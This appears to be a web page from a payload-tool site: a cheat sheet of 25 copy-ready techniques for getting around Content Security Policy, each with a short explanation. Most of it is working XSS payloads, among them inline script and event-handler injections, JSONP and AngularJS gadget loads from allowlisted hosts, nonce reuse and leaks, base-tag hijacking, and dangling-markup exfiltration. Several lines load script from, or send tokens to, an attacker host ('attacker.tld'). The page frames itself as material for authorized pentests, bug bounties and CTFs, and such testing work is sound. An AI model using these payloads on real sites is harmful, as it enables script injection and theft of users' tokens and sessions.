CSP Bypass Cheat Sheet

Copy-ready techniques for bypassing Content Security Policy during authorized pentests, bug-bounty, and CTF/OSCP engagements. (25 payloads)

Build custom CSP Bypass payloads in the XSS Payload generator

Recon & Policy Analysis

(4)

curl -sI https://target.tld/ | grep -i 'content-security-policy'

Dump the live CSP from the response headers so you can see every directive, allowlisted host, and any unsafe-* keywords before testing.Also check the <meta http-equiv="Content-Security-Policy"> tag in HTML, which can carry a separate policy.

https://csp-evaluator.withgoogle.com/ (or the Payload Playground CSP Evaluator tool)

Paste the policy to flag high-risk findings: missing object-src/base-uri, unsafe-inline, wildcard hosts, and known-bypassable allowlisted CDNs.Google's CSP Evaluator encodes a large list of CDN hosts that host JSONP or framework gadgets.

Content-Security-Policy-Report-Only: default-src 'self'; report-uri /csp

A Report-Only header is NOT enforced — it only logs violations. Confirm the policy is sent as enforcing Content-Security-Policy, not Report-Only.A common misconfiguration: shipping Report-Only to prod thinking it blocks injection.

default-src 'self' (no script-src, no object-src, no base-uri)

When script-src is absent it falls back to default-src; but object-src and base-uri do NOT fall back. Missing object-src 'none' allows <object>/<embed> plugin payloads; missing base-uri enables base-tag attacks.object-src and base-uri must be set explicitly — they ignore default-src.

Weak Keywords: unsafe-inline / unsafe-eval / wildcards

(5)

<script>alert(document.domain)</script>

If script-src contains 'unsafe-inline' (and no nonce/hash overrides it), inline scripts execute directly — CSP provides effectively no XSS protection.Policy: script-src 'self' 'unsafe-inline'

<img src=x onerror=alert(document.domain)>

'unsafe-inline' also permits inline event handlers, so classic HTML-attribute XSS works without any external resource.Works whenever inline scripts are allowed (no nonce-only enforcement).

<script>eval(location.hash.slice(1))</script> → #alert(document.domain)

With 'unsafe-eval', string-to-code sinks (eval, setTimeout('...'), Function()) execute attacker-controlled strings, enabling gadget chains even under nonce-based policies.Policy: script-src 'nonce-...' 'unsafe-eval' — eval gadgets bypass the nonce requirement.

<script src=https://attacker.tld/x.js></script>

A wildcard host (e.g. script-src *) or scheme source (script-src https:) lets you load script from any origin you control.Policy: script-src https: loads any HTTPS origin; script-src * loads anything.

<script src=data:text/javascript,alert(document.domain)></script>

If the policy allows the data: scheme in script-src, you can inline a full script via a data URI without any external host.Policy: script-src 'self' data:

Nonce & Hash Weaknesses

(4)

<script nonce="REUSED_NONCE">alert(document.domain)</script>

If the same nonce value is reused across responses (static/predictable nonce), grab it once and reuse it in your injected script tag. Nonces must be fresh per response and cryptographically random.Test by requesting the page twice and comparing the nonce attribute.

<script src="//attacker.tld/x.js" nonce="VALID_NONCE"></script>

If your injection point is in the same response as a legitimate nonced script, copy that response's nonce onto a script tag pointing to your own host.Reflected/stored XSS where the page's current nonce is visible in the markup.

<link rel=preload href=//attacker.tld nonce=VALID_NONCE> / nonce-leak via <script nonce=...> attribute exfil

Markup that copies the nonce into an attacker-readable attribute (e.g. CSS attribute selectors or dangling markup) can leak the nonce for reuse. Nonces in non-script attributes can be stolen.Combine with dangling-markup or CSS exfiltration to read the nonce char-by-char.

<script src="https://allowed-cdn.tld/known-lib.js?VALID_NONCE_OR_HASH"></script>

If a hash in the policy matches a file you can influence, or a nonce can be applied to an allowlisted CDN file that contains a usable gadget, you execute trusted code as a gadget.Hash-based CSP only protects exact content — a CDN gadget with a matching hash still runs.

Allowlisted-Host Gadgets: JSONP & CDN Frameworks

(6)

<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(document.domain)"></script>

A JSONP endpoint on an allowlisted host reflects your callback name into executable JS. Pick any JSONP endpoint hosted on a domain present in script-src.Works when *.google.com (or similar) is allowlisted. JSONPBypass / Google's list documents many such endpoints.

<script src="https://www.youtube.com/oembed?callback=alert(1)&url=https://youtu.be/x"></script>

Generic JSONP gadget pattern — any allowlisted host with a callback= parameter that wraps JSON in your function name yields arbitrary JS execution.Enumerate JSONP endpoints on each allowlisted domain (?callback=, ?jsonp=, ?cb=).

<div ng-app ng-csp><div ng-click=$event.view.alert(1337)>click</div></div>  +  <script src="//ALLOWED_CDN/angular.min.js"></script>

AngularJS on an allowlisted CDN is a script gadget: inject ng-app to bootstrap Angular, then use Angular expression sinks to run code without inline script.Allowlisted host serves AngularJS (e.g. ajax.googleapis.com, cdnjs). ng-csp avoids unsafe-eval need.

<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'"> (AngularJS sandbox-escape style)

AngularJS expression-sandbox-escape gadget: when AngularJS loads from an allowlisted CDN, expression injection reaches the JS engine. Classic gadget for nonce/strict-dynamic-free policies.AngularJS < 1.6 had a removable sandbox; even later versions are exploitable as CSP gadgets.

<x ng-app>{{constructor.constructor('alert(1)')()}}</x>

AngularJS template-injection gadget — the interpolation reaches Function constructor and executes. Bootstraps when AngularJS from an allowlisted source is present on the page.Use when the CDN host is trusted and you can inject AngularJS directives/interpolation.

<script src=//ALLOWED_CDN/prototype.js></script> <script src=//ALLOWED_CDN/angular.js></script> (script-gadget chaining)

Allowlisted libraries with auto-executing behavior (Google's research catalog: Prototype.js, AngularJS, etc.) act as 'script gadgets' that turn benign HTML injection into JS execution.Reference: Lekies/Kotowicz 'Trusted Types & script gadgets' research and the CSP bypass cheatsheets.

base-uri, Dangling Markup & Injection Tricks

(6)

<base href="https://attacker.tld/">

If base-uri is missing/unset, inject a <base> tag to change the document base URL. Subsequent relative-path scripts (even nonced ones) then load from your host.Most effective when the page uses relative <script src="app.js"> with a nonce — your base hijacks where it loads from.

<img src='https://attacker.tld/log?leak= (unclosed quote — dangling markup)

Dangling-markup injection: an unterminated attribute swallows the following HTML up to the next matching quote, exfiltrating tokens (CSRF tokens, nonces) to your server via the partial request URL.Useful when CSP blocks script execution but img/connect to your host (or a wildcard) is allowed.

<link rel=prefetch href="https://attacker.tld/?" (or <meta http-equiv=refresh ...) dangling sink

When <img> is blocked, use other no-script HTML sinks that fire network requests to leak data trapped by the dangling markup.Pick a sink whose destination scheme/host is permitted by the policy (or unconstrained).

Content-Security-Policy: script-src 'self'  →  upload/host JS at https://target.tld/uploads/x.js then <script src=/uploads/x.js>

'self' trusts the origin itself: any endpoint that reflects/hosts attacker-controlled JS on-origin (file upload, open redirect to a JSONP-like path, JSON endpoint served as text/javascript) defeats 'self'.Look for upload dirs, user-content paths, or content-type confusion on the same origin.

<script src="https://target.tld/redirect?url=https://attacker.tld/x.js"></script>

If 'self' or an allowlisted host has an open redirect, CSP may follow the redirect to a non-allowlisted origin for path-based source expressions (redirect bypasses path restrictions).Open redirects can also relax allowlisted-path restrictions to the host root.

<script src="https://allowed-cdn.tld/some/../../path/x.js"> / ;%2f path tricks

Path-restricted allowlist entries (host/a/b/) can sometimes be bypassed with path traversal, redirects, or matrix/encoded separators to reach other files on the same trusted host.CSP path matching is prefix-based; redirects and traversal can reach unintended files.

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

XSS Payload

Related Tools

CSP Evaluator

Related Cheat Sheets

XSS Cheat Sheet CORS Misconfiguration Cheat Sheet

Frequently asked questions

What is the CSP Bypass Cheat Sheet?+

It's a quick-reference collection of 25 CSP Bypass payloads for testing CSP Bypass vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these CSP Bypass payloads?+

Copy any payload straight into your authorized test, or open the XSS Payload generator to build customized CSP Bypass variants with encoding and WAF-bypass options. Only test systems you have explicit permission to assess.

Are these CSP Bypass payloads free to use?+

Yes — this cheat sheet and all CSP Bypass payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the CSP Bypass Cheat Sheet?+

How do I use these CSP Bypass payloads?+

Are these CSP Bypass payloads free to use?+

Yes — this cheat sheet and all CSP Bypass payloads are completely free, with no account required. Everything runs in your browser.